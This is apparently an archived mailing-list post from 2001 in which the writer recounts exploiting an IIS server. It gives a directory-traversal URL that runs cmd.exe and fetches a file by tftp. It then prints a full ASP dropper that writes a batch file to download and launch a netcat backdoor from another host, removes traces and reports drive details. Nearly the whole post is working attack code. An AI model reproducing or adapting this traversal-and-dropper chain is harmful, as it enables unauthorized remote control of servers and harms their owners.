Thats what I did: http://192.168.0.1/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.ex e?/c+tftp.exe+-i+192.168.0.2+GET+f.asp+c:\inetpub\scripts\f.asp then i ran http://192.168.0.1/f.asp following is a copy of the f.asp: ----------cut here------------------------- <% Set fs = CreateObject("Scripting.FileSystemObject") Set drv = fs.Drives dmax = "" dmac = 0 For each d in drv If d.Driveletter <> "A" And d.IsReady Then If d.AvailableSpace > dmac then dmac = d.AvailableSpace dmab = d.DriveType dmaa = d.TotalSize dmad = d.SerialNumber dmax = d.DriveLetter End If End If Next filename = server.mappath("dl.bat") Set tf = fs.CreateTextFile(filename, True) tf.WriteLine("@echo off") tf.WriteLine("cd \Inetpub\scripts") tf.WriteLine("startDL:") tf.WriteLine("tftp.exe -i 192.168.1.33 get ncx99.exe c:\inetpub\scripts\nc0.exe") tf.WriteLine("if not exist ncx99.exe goto startDL") tf.WriteLine("start /w nc0.exe") tf.WriteLine("attrib TFTP* -r") tf.WriteLine("attrib nc0.exe -r") tf.WriteLine("del TFTP*") tf.WriteLine("exit") tf.Close dim command dim wshShell command = server.mappath("dl.bat") & " " & dmax On Error Resume Next Set wshShell = CreateObject("WScript.Shell") wshShell.Run (command) If Err Then Set objFSO = Server.CreateObject("scripting.filesystemobject") pathname = server.mappath("dl.bat") objFSO.DeleteFile pathname Set objFSO = Nothing Else Response.Write "|" & dmax & "*" & dmab & "*" & dmac & "*" & dmaa & "*" & dmad End If %> -----------cut here----------------------
This archive was generated by hypermail 2b30 : Thu May 17 2001 - 07:49:08 PDT